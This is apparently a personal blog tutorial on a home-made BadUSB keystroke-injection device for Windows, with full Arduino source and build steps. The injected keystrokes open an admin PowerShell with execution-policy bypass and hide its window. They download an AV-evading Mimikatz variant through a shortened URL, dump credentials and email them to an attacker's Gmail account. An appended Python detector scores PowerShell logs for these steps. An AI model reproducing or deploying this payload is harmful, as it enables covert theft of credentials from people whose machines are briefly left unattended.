Home-made Rubber Duckies: Snagging Windows Credentials in 15 Seconds
I’ve always been very interested in the social engineering
side of cyber security. A report
from the cyber security firm Agari includes results from polling 200 professionals
from varying sectors. It found that 60% of the security leaders said
their organisation had most likely been the victim of a social engineering attack
in just the past year, and that in 65% of those attacks employees’ credentials had
been snagged. I did some research into the different types of social engineering
attack; the usual phishing emails containing malicious macros
seemed to be the downfall of a lot of organisations.
A tool called the Rubber Ducky
from Hak5 caught my eye. Hak5 state “Take
Social Engineering to the next level with a USB Rubber Ducky Deluxe”, and I can
see why. The Rubber Ducky is known as a HID (Human Interface Device) attack,
and takes advantage of the fact that computers inherently trust HIDs for convenience’s
sake. Once plugged in, the Rubber Ducky simulates a keyboard with no interruptions,
as the OS thinks it’s just a human typing away. Now perhaps you’re wondering what
can be done with this breach of trust? Well, according to Hak5, keystrokes can be passed in at over 1000 words per minute. So you only need to distract
someone from a computer for 15 seconds instead of the 5 minutes it might take
you to type manually.
The problem is that Rubber Duckies are expensive and must be
shipped from America. After a little research, I discovered you could use
Arduino boards if they use the ATMEGA32U4 chip, which can essentially simulate
a keyboard. I ended up ordering a BadUsbBeetle from eBay for £6.45, much more reasonable than a Rubber Ducky. You can
go even cheaper
at £1.30, however these have less flash memory and look a lot more conspicuous. In
the end, I ordered the Bad Beetle and about a week later my package from China
arrived.
In that time, I came across a tool called Mimikatz. Mimikatz can
extract plaintext credentials from memory and password hashes from local
SAM/NTDS.dit databases, offers advanced Kerberos functionality, and more. Sounds
amazing, right? Right away I knew my mission was to combine my BadUsb and Mimikatz.
As the BadUsb doesn’t have onboard storage, we must
download Mimikatz and upload the results elsewhere; luckily, Windows now ships with PowerShell.
PowerShell is our ally and will be the main area of our attack, as it can
do everything we need and the execution is done in memory, which makes it harder
for AV to detect as we never touch the disk. Also, our session will be erased
once we finish, as PowerShell usually won’t keep session history (note that where PowerShell
script block logging is enabled, each command is still recorded in the Windows event log). So we can use
PowerShell’s built-in download function to download Mimikatz, and use PowerShell
to email the results straight to us. Perfect!
The first obstacle was getting PowerShell to run as
administrator so we have permission (to be able to download and use a few other commands), using only keyboard commands. This can be achieved by simulating these key presses (try it if you're on Windows):
- Left Ctrl + Esc
- Type cmd
- Left Ctrl + Left Shift + Enter
- Left Arrow + Enter
- Type: start powershell -ex bypass && exit
- Hit Enter
There you go! PowerShell as admin!
The next step was to download Mimikatz with:
IEX (New-Object Net.WebClient).DownloadString('https://example')
This is where we hit our next big obstacle. Antivirus was catching it every
time; clearly the signature
was known to most AV. So we must change Mimikatz’s signature, which is where I came
across this article: http://www.blackhillsinfosec.com/?p=5555. This is also a great example of the weaknesses of signature-based security.
Once we had followed those steps we uploaded our code to GitHub
and got a shortened URL, git.io/vywDP, to use for our download. Next was to invoke Mimikatz and email the results to
ourselves, which we can do with this PowerShell script:
# $Body holds the Mimikatz output (here we use the -dumpcreds option)
$Body = <Mimikatz results>
$EmailFrom = 'gmailname@gmail.com'
$EmailTo = 'gmailname@gmail.com'
$Subject = 'Report'
$SMTPServer = 'smtp.gmail.com'
$SMTPClient = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
$SMTPClient.EnableSsl = $true
$SMTPClient.Credentials = New-Object System.Net.NetworkCredential('gmailname', 'gmail password')
$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)
This works brilliantly! However, if someone saw this happening
on a monitor it would raise some suspicions. So I went back, made the CMD window exit and shrank the PowerShell window with this line:
[console]::WindowHeight=1;[console]::WindowWidth=1
Bingo! You can snag Windows XP, 7 and 8 credentials in
under 15 seconds. On Windows 10, however, you will only receive a hash (Windows 8.1 and later
no longer keep WDigest plaintext credentials in memory by default), which you
can try to crack yourself or upload to something like https://crackstation.net/ to see the plaintext
password.
I have included a copy of the whole code at the bottom of this article.
To try this yourself:
- Download the Arduino IDE: https://www.arduino.cc/en/main/software
- Make sure you select Tools > Board > Leonardo
- Download the .ino from here (you can just copy and paste it in).
- If you are on Linux you will need to change permissions with: sudo usermod -a -G dialout $USER
- Make sure you enter your Gmail username and password in the correct place; I suggest you create a new account for this.
- Click Verify, then Upload. It will start typing straight away, so watch out!
Proof Of Concept Video
This is how the code looks; the delays are to stop the keyboard tumbling over itself:
#include "Keyboard.h"
void typeKey(int key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
/* Init function */
void setup()
{
// Beginning the Keyboard stream, then a delay to give the computer time to recognise the device
Keyboard.begin();
delay(4000);
// Opens CMD as admin
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
delay(1000);
Keyboard.print("cmd");
delay(400);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(800);
typeKey(KEY_LEFT_ARROW);
typeKey(KEY_RETURN);
delay(1500);
// Opens Powershell as admin and exits CMD
Keyboard.print("start powershell -ex bypass && exit");
typeKey(KEY_RETURN);
delay(2000);
// Shrinks Powershell
Keyboard.print("[console]::WindowHeight=1;[console]::WindowWidth=1");
typeKey(KEY_RETURN);
delay(400);
// Downloads Mimidogz
Keyboard.print("IEX (New-Object Net.WebClient).DownloadString('https://git.io/vywDP')");
typeKey(KEY_RETURN);
delay(5000);
// Invokes Mimidogz
Keyboard.print("$Body = Invoke-MimiDogz -DumpCred");
typeKey(KEY_RETURN);
delay(5000);
// Emails Results and exits
// The Keyboard library sends US-layout keycodes, so on a UK-layout host \" arrives as @ and @ arrives as "
Keyboard.print("$EmailFrom = 'gmailname\"gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$EmailTo = 'gmailname\"gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$Subject = 'Report'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPServer = 'smtp.gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.EnableSsl = $true");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.Credentials = New-Object System.Net.NetworkCredential(@gmailname without @gmail.com@, @gmail password@);");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.EnableSsl = $true");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)");
typeKey(KEY_RETURN);
delay(800);
Keyboard.print("exit");
typeKey(KEY_RETURN);
// Ending stream
Keyboard.end();
}
/* Unused endless loop */
void loop() {}
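Seen from the defending side, the chain above leaves a recognisable trail in PowerShell script block logs (Event ID 4104) and in process command lines. The detector below is an added example, not code from the original post: it scores constructed sample events for the indicators the post itself relies on, and the event shape, timestamps and alert threshold are assumptions.

```python
import re
from collections import defaultdict, namedtuple
# Indicators mirrored from the commands the post types, each with a weight.
RULES = [
    ("exec_policy_bypass", r"\s-e\w*\s+bypass\b", 2),
    ("console_shrink", r"\[console\]::window(height|width)\s*=\s*1\b", 3),
    ("download_cradle", r"\biex\s*\(\s*new-object\s+net\.webclient\s*\)\.downloadstring", 3),
    ("cred_dump_switch", r"-dumpcreds?\b", 4),
    ("smtp_client", r"net\.mail\.smtpclient\s*\(", 2),
    ("smtp_send", r"\$\w+\.send\(\s*\$emailfrom", 2),
]
COMPILED = [(name, re.compile(pat, re.I), w) for name, pat, w in RULES]
THRESHOLD = 8  # assumed alert threshold: no single indicator alerts on its own
# ts: seconds since epoch (constructed); pid: PowerShell host process; text: command line or 4104 ScriptBlockText
Event = namedtuple("Event", "ts pid text")

def _score(pid, chunk):
    text = "\n".join(e.text for e in chunk)
    hits = [(name, w) for name, rx, w in COMPILED if rx.search(text)]
    score = sum(w for _, w in hits)
    return {"pid": pid, "start": chunk[0].ts, "score": score,
            "hits": [name for name, _ in hits], "suspicious": score >= THRESHOLD}

def score_events(events, window=60.0):
    """Group events per pid into sessions at most `window` seconds long and score each (the injected chain runs in well under a minute)."""
    by_pid = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_pid[e.pid].append(e)
    sessions = []
    for pid, evs in by_pid.items():
        chunk = [evs[0]]
        for e in evs[1:]:
            if e.ts - chunk[0].ts > window:
                sessions.append(_score(pid, chunk))
                chunk = [e]
            else:
                chunk.append(e)
        sessions.append(_score(pid, chunk))
    return sessions

# Constructed sample: one injected session (pid 4242) beside an admin's normal mail script (pid 5151).
SAMPLE = [
    Event(1000.0, 4242, "start powershell -ex bypass && exit"),
    Event(1002.5, 4242, "[console]::WindowHeight=1;[console]::WindowWidth=1"),
    Event(1003.0, 4242, "IEX (New-Object Net.WebClient).DownloadString('https://git.io/EXAMPLE')"),
    Event(1008.5, 4242, "$Body = Invoke-MimiDogz -DumpCred"),
    Event(1014.0, 4242, "$SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"),
    Event(1015.0, 4242, "$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)"),
    Event(1100.0, 5151, "$c = New-Object Net.Mail.SmtpClient('smtp.example.test', 587)"),
]
```

Running `score_events(SAMPLE)` flags only pid 4242; the lone SmtpClient line from the admin session scores below the threshold, which is the point of weighting the chain rather than any single command.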